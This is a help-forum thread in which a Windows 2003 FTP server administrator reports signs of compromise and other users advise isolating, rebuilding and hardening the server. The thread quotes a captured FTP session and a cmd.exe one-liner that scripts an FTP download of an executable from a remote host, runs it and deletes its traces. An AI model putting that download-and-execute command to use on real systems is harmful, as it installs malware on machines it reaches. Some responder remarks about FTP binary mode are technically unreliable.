• Status: Solved
  • Priority: Medium
  • Security: Public
  • Views: 867
  • Last Modified:

FTP server - possible virus/backdoor/trojan?

I have a standard fully patched Windwos 2003 Server running as an FTP server, I have done a full virus and spywear scan but everyso often I log in va VNC and there will be a command prompt open with the following text:

Could Not Find C:\Documents and Settings\Administrator\i
ftp> open xx.xx.xxx.xxx 4235
Connected to xx.xx.xxx.xxx.
220 Reptile welcomes you..
ftp> user 1 1
331 Password required
230 User logged in.
ftp> get 532.exe
200 PORT command successful.
150 Opening BINARY mode data connection

This is VERY worrying - and I cant find a lot of info about it - I admit my IIS installation may not be very secure - can someone advise me on this issue?
1 Solution
Kruno DžoićSystem EngineerCommented:
services.msc, and check for services with letters ftp or strange services ( use google to indentify services )
STEVEO5Author Commented:
Had a look - couldnt find anythign strange - although i noticed this command in the Start, run dialogue and I didnt type it - any ideas?

cmd.exe /c del i&echo open xx.xx.xxx.xxx 6745 > i&echo user 1 1 >> i &echo get 870.exe >> i &echo quit >> i &ftp -n -s:i &870.exe&del i&exit
Do you have a firewall in front of this server?
If not, you NEED a fw.
If so, what do the logs say that is going on to/from this FTP server?

I bet someone has compromised your system and is uploading/downloading to/from it based on what you see.

I would:
- Remove this server from the network
- Rebuild this FTP server, patch it and follow an Internet server hardening guide
- Install a network fw in front of it and limit access to the rebuilt  FTP server
- Monitor network activity just in case other systems have been compromised

WEBINAR: GDPR Implemented - Tips & Lessons Learned

Join the WatchGuard team on Thursday, March 29th as we recount some valuable lessons learned in weighing the needs of a business against the new regulatory environment, look ahead at the two months left before implementation, and help you understand the steps you can take today!

Well, it's difficult for me to tell you exactly what's going on, it sure looks like a hack.

But the thing i can tell you is it's likely the hacker is coming from a computer that is running UNIX

UNIX (and maybe linux as well i'm not 100% sure) ftp requires the connection to enter "BINARY mode" to transfer data, that was a big tip off to me, is that your server is 2003 and yet it is in binary mode something odd for a windows box to my knowledge

Is this a FTP server with logon requied?  If so doesn't windows transmit FTP user/passwords in plain text so a packet sniffer could have sniffed out a login and is now accessing your FTP.

Check your logs for connections and the users who connected you may find your answers there.

In fact either this is a script, or it's definately a hack, the command flags indicate suspicious behavour, running the command then closing the prompt "cmd.exe /c" then he get's a file 870.exe off of a remote sever.  Then he does "ftp -n -s" supresses the login and runs the executable with the -s command, then exits the command.

I'd say look for the file 870.exe but it appears that he deletes it before he leaves.  I'd beef up security definately.
STEVEO5Author Commented:
Server is behind a router/firewall.

Can you advise on a server hardening guide?

My FTP server dosent require authentication - however SOME virtual directorys restrict access by only allowing pcs on the local subnet
Follow the 2003 server hardening guides here: http://support.microsoft.com/default.aspx/kb/885409

Ok, did you verify that the firewall is only allowing access to the FTP service on this server?
If not, you need to scan your server from the Net and verify that you're only serving FTP.

This was troubling and also part of why you were just hacked:
"My FTP server dosent require authentication - however SOME virtual directorys restrict access by only allowing pcs on the local subnet"

Anything on a network and especially something connected to the Internet requires authentication.

Anonymous access access to FTP is somewhat fine these days, but access to virtual directories should always be authenticated.
Forced accept.

EE Admin
Question has a verified solution.

Are you are experiencing a similar issue? Get a personalized answer when you ask a related question.

Have a better answer? Share it in a comment.

Join & Write a Comment

Featured Post

Get your problem seen by more experts

Be seen. Boost your question’s priority for more expert views and faster solutions

Tackle projects and never again get stuck behind a technical roadblock.
Join Now